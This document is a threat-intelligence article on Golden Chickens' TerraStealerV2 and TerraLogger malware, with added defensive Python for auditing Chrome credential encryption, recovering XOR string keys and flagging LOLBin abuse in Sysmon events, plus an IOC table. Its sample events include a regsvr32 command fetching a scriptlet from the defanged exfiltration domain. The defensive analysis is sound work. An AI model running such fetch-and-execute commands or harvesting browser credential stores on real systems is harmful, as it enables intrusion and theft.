The financially motivated cybercrime group Golden Chickens, which also operates under the alias Venom Spider, has rolled out two new malicious tools, TerraStealerV2 and TerraLogger, marking an escalation of its credential and sensitive-data theft operations in early 2025.
These developments, tracked by Recorded Future's Insikt Group, signal continued development of the group's Malware-as-a-Service (MaaS) platform, which has historically been used by syndicates such as FIN6, Cobalt Group, and Evilnum.
Stealer & Logger: Technical Evolution
TerraStealerV2 is built to exfiltrate browser credentials, cryptocurrency wallet data, and data belonging to browser extensions.
Technically, the malware targets Chrome's "Login Data" SQLite database and reads the saved credentials directly from it.
However, TerraStealerV2 does not bypass Chrome's Application-Bound Encryption (ABE), introduced in July 2024 (Chrome 127). Against a current Chrome build, the password values it collects therefore remain encrypted with a key that a copied database does not yield, which suggests the malware is either incomplete or lagging behind current browser security.
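The effect of ABE on a stolen "Login Data" file can be checked from the defender's side without decrypting anything: on Windows, Chrome prefixes each saved password blob with the scheme that protects it (`v10` for the older AES-GCM key kept DPAPI-protected in "Local State", `v20` for an app-bound key). The Python script below is an added example, not code from the article or from Recorded Future; it opens a "Login Data" file read-only, counts entries per scheme, and builds a small constructed database (made-up rows, minimal schema) so it can be run offline.

```python
import sqlite3
import tempfile
from collections import Counter
from pathlib import Path

# Prefixes Chrome on Windows writes at the front of each password_value blob:
#   b"v10": AES-GCM with a key kept DPAPI-protected in the profile's "Local State"
#           (pre-Chrome 127 scheme); any process running as the user can unwrap it,
#           which is the case a plain "Login Data" grab still covers.
#   b"v20": Application-Bound Encryption (Chrome 127, July 2024); the key is released
#           only to Chrome by an elevated service, so a copied database yields ciphertext.
DPAPI_KEY_PREFIX = b"v10"
APP_BOUND_PREFIX = b"v20"


def classify_password_blob(blob: bytes) -> str:
    """Label one password_value blob by the protection scheme its prefix indicates."""
    if blob.startswith(APP_BOUND_PREFIX):
        return "app-bound"
    if blob.startswith(DPAPI_KEY_PREFIX):
        return "dpapi-key"
    if not blob:
        return "empty"
    return "unknown"


def audit_login_data(db_path: str) -> Counter:
    """Open a 'Login Data' file read-only and count saved passwords per scheme.
    On a live system work on a copy or with Chrome closed: Chrome keeps the
    database locked while running, which is why the stealer kills Chrome first."""
    uri = Path(db_path).resolve().as_uri() + "?mode=ro"
    conn = sqlite3.connect(uri, uri=True)
    try:
        rows = conn.execute("SELECT password_value FROM logins").fetchall()
    finally:
        conn.close()
    return Counter(classify_password_blob(row[0] or b"") for row in rows)


# Constructed sample rows (assumption: only the columns needed here, not Chrome's full schema).
SAMPLE_ROWS = [
    ("https://mail.example.test/", "alice", b"v10" + bytes(28)),  # legacy, DPAPI-keyed
    ("https://bank.example.test/", "alice", b"v20" + bytes(44)),  # app-bound
    ("https://shop.example.test/", "bob", b"v20" + bytes(44)),    # app-bound
]


def build_sample_login_data(db_path: str) -> None:
    """Write the constructed rows into a minimal 'logins' table."""
    conn = sqlite3.connect(db_path)
    try:
        conn.execute(
            "CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)"
        )
        conn.executemany("INSERT INTO logins VALUES (?, ?, ?)", SAMPLE_ROWS)
        conn.commit()
    finally:
        conn.close()


def demo() -> dict:
    """Build the sample database in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = str(Path(tmp) / "Login Data")
        build_sample_login_data(path)
        return dict(audit_login_data(path))


if __name__ == "__main__":
    print(demo())  # {'dpapi-key': 1, 'app-bound': 2}
```

Point `audit_login_data` at a copy of a real profile's "Login Data" to see how many entries a stealer of this class could still decrypt: only the `v10` count matters to it, and a profile that has been through Chrome 127 or later migrates its entries to `v20`.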
Data lifted by TerraStealerV2 is exfiltrated over Telegram bot infrastructure and through a secondary endpoint, wetransfers[.]io, both of which are built into the attack chain.
Distribution vectors for TerraStealerV2 are varied, comprising Windows shortcut files (LNK), installer packages (MSI), dynamic-link libraries (DLL), and executables (EXE).
Execution relies heavily on trusted, Microsoft-signed Windows utilities such as regsvr32.exe and mshta.exe, a living-off-the-land approach that aids evasion of conventional endpoint detection and response (EDR) solutions.
Once executed, the malware performs anti-analysis checks, deobfuscates its embedded strings with XOR, gathers system and user information, and attempts to terminate running Chrome processes so that the credential database, which Chrome holds locked while it runs, can be read.
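XOR string obfuscation of the kind mentioned above is usually undone by an analyst with one known plaintext rather than by brute force. The Python below is an added example, not code from the article or from the malware: given a blob, a guessed string that the sample must contain (here "chrome.exe"), and a key length, it derives the key at every candidate offset and keeps the alignment whose full decode looks most like a string table. The blob, the 3-byte key and the key length are constructed for the demo; nothing on the page states the real key or its length.

```python
from typing import List, Tuple

# Byte values expected in a decoded C string table: printable ASCII plus NUL terminators.
PLAUSIBLE = set(range(0x20, 0x7F)) | {0}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def plausibility(buf: bytes) -> float:
    """Fraction of bytes that look like string-table content (1.0 = every byte plausible)."""
    return sum(b in PLAUSIBLE for b in buf) / max(len(buf), 1)


def recover_repeating_key(blob: bytes, crib: bytes, key_len: int) -> Tuple[bytes, int]:
    """Recover a repeating XOR key of length key_len from one known plaintext (crib).
    At every offset where the crib could sit, key bytes are cipher XOR plain; rotate
    them into key order, decode the whole blob, and keep the alignment whose output
    looks most like a string table. Returns (key, offset of the crib)."""
    if len(crib) < key_len:
        raise ValueError("crib must be at least as long as the key")
    best_key, best_off, best_score = b"", -1, -1.0
    for off in range(len(blob) - len(crib) + 1):
        # stream[i] is the key byte used at absolute position off + i
        stream = [blob[off + i] ^ crib[i] for i in range(key_len)]
        # key[j] is used at positions p with p % key_len == j, so j == (off + i) % key_len
        key = bytes(stream[(j - off) % key_len] for j in range(key_len))
        score = plausibility(xor_bytes(blob, key))
        if score > best_score:
            best_key, best_off, best_score = key, off, score
    return best_key, best_off


def split_strings(decoded: bytes) -> List[str]:
    """Split a NUL-separated string table into Python strings."""
    return [s.decode("ascii", "replace") for s in decoded.split(b"\x00") if s]


# Constructed sample: a small string table of the kind an infostealer embeds, XORed with a
# made-up 3-byte key. Key, key length and table contents are assumptions for this demo.
SAMPLE_KEY = bytes.fromhex("5a17c3")
SAMPLE_TABLE = b"\x00".join([b"Login Data", b"Local State", b"wetransfers.io", b"chrome.exe"]) + b"\x00"
SAMPLE_BLOB = xor_bytes(SAMPLE_TABLE, SAMPLE_KEY)


def demo() -> Tuple[bytes, List[str]]:
    """Recover the key from the crib and return it with the decoded strings."""
    key, _ = recover_repeating_key(SAMPLE_BLOB, b"chrome.exe", key_len=3)
    return key, split_strings(xor_bytes(SAMPLE_BLOB, key))


if __name__ == "__main__":
    key, strings = demo()
    print(key.hex(), strings)
```

When the key length is unknown, run the recovery for each plausible length (1 up to the crib length) and compare the plausibility scores; a single-byte key is just the `key_len=1` case of the same routine.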
After collecting login credentials, browser extension data, and wallet directories, TerraStealerV2 compresses them into an archive for exfiltration.
This archive is sent both to the operator's Telegram channel and to the wetransfers[.]io infrastructure, where the operators collect it.
The malware also reports each successful compromise, transmitting host identifiers and the number of wallets found.
In parallel, TerraLogger adds a standalone keylogging capability to the Golden Chickens toolkit, another first for the group.
The logger installs a standard low-level keyboard hook (SetWindowsHookExA with the WH_KEYBOARD_LL hook type), capturing all keystrokes and writing them to files on disk (e.g., a.txt, op.txt, save.txt).
Unlike mature infostealers, TerraLogger currently has no built-in exfiltration, which suggests it is intended as a modular component or is still in early development.
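Both the distribution chain described earlier (regsvr32.exe and mshta.exe launched to fetch or run a payload) and the TerraLogger keystroke files can be caught from ordinary Sysmon process-creation and file-creation telemetry. The Python below is an added example, not code from the article or from Recorded Future, of that detection logic run over a handful of constructed Sysmon-style events (field names follow Sysmon; user names and the non-IOC paths are made up, and the exfiltration URL is the article's domain kept defanged). The rules flag a LOLBin whose command line points at a network URL or at a user-writable staging path, and any write to the reported keystroke log locations.

```python
import re
from typing import Dict, List, Tuple

# Trusted Windows utilities the distribution chain abuses (living off the land).
LOLBINS = {"regsvr32.exe", "mshta.exe"}
# A LOLBin told to fetch its scriptlet or HTA from the network (regsvr32 /i:<url>, mshta <url>).
REMOTE_SOURCE = re.compile(r"https?://", re.IGNORECASE)
# A payload staged in a user-writable location instead of the Windows directory.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp)\\", re.IGNORECASE)
# Keystroke log locations reported for TerraLogger: exact-path IOCs, cheap but brittle.
TERRALOGGER_PATHS = {
    r"c:\programdata\save.txt", r"c:\programdata\a.txt",
    r"c:\programdata\op.txt", r"c:\programdata\f.txt",
}

Event = Dict[str, object]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev: Event) -> List[str]:
    """Sysmon event 1 rules: a LOLBin whose command line names a remote or user-writable payload."""
    hits: List[str] = []
    if basename(str(ev.get("Image", ""))) in LOLBINS:
        cmd = str(ev.get("CommandLine", ""))
        if REMOTE_SOURCE.search(cmd):
            hits.append("lolbin-remote-payload")
        if USER_WRITABLE.search(cmd):
            hits.append("lolbin-user-writable-payload")
    return hits


def check_file_create(ev: Event) -> List[str]:
    """Sysmon event 11 rule: a write to one of the reported TerraLogger keystroke log paths."""
    target = str(ev.get("TargetFilename", "")).lower()
    return ["terralogger-log-path"] if target in TERRALOGGER_PATHS else []


def triage(events: List[Event]) -> List[Tuple[int, str]]:
    """Run every rule over a batch of events; returns (event index, rule name) pairs."""
    findings: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        if ev.get("EventID") == 1:
            hits = check_process_create(ev)
        elif ev.get("EventID") == 11:
            hits = check_file_create(ev)
        else:
            hits = []
        findings.extend((idx, h) for h in hits)
    return findings


# Constructed Sysmon-style events for the demo (not real telemetry from the campaign).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:https://wetransfers[.]io/v.php scrobj.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\invoice.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},  # ordinary use, must not fire
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Roaming\upd.exe", "TargetFilename": r"C:\ProgramData\a.txt"},
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe", "TargetFilename": r"C:\ProgramData\Microsoft\log.txt"},  # must not fire
]


def demo() -> List[Tuple[int, str]]:
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for idx, rule in demo():
        print(idx, rule)
```

The first two rules are behavioural and survive a change of infrastructure; the path rule is an IOC match and should be expected to break as soon as the file names change, so treat it as a cheap hunt query rather than a durable detection.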
Attribution, Impact, and Ongoing Threats
Golden Chickens' latest toolkit reinforces its reputation as a premier MaaS provider, underpinning sophisticated access and data theft campaigns against high-value targets.
The group’s malware ecosystem is deeply modular, allowing crimeware operators to chain components like VenomLNK, TerraLoader, and now TerraStealerV2 and TerraLogger for tailored attacks.
Attribution efforts tie the Golden Chickens operation to personas in Eastern Europe and North America, with a development lineage spanning from underground forums to high-profile intrusions affecting multinational brands.
Current samples of TerraStealerV2 and TerraLogger lack the stealth and encryption-bypass sophistication of the group's most advanced offerings.
Nevertheless, researchers broadly expect these tools to evolve quickly, gaining more robust evasion and exfiltration features as updates are released.
Indicators of Compromise (IOCs)
| Threat Component | SHA-256 / Path / Domain | Description / Use |
|---|---|---|
| TerraStealerV2 | 828eee78537e49b46e34a754306ccf67f6281b77e5caeaf53132a32b6b708e5c | Payload hash (sample) |
| TerraStealerV2 | wetransfers[.]io, wetransfers[.]io/uplo.php, wetransfers[.]io/v.php | Exfiltration and download infrastructure |
| TerraStealerV2 | Telegram bot: NoterdanssBot; Channel: -4652754121 | Exfiltration C2 via Telegram |
| TerraLogger | 067421234fdd631628569bd86b6757ce4c78139c3609493c92db7b096b0c22f4 | Sample (compiled 2025-01-13 14:16:35 UTC) |
| TerraLogger | c:\programdata\save.txt, c:\programdata\a.txt, c:\programdata\op.txt, c:\programdata\f.txt | Keystroke log locations |
| Distribution Chain | regsvr32.exe, mshta.exe, curl.exe, PowerShell | Living-off-the-land tools used for execution |
| Distribution Chain | LNK: 9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a | Example delivery sample |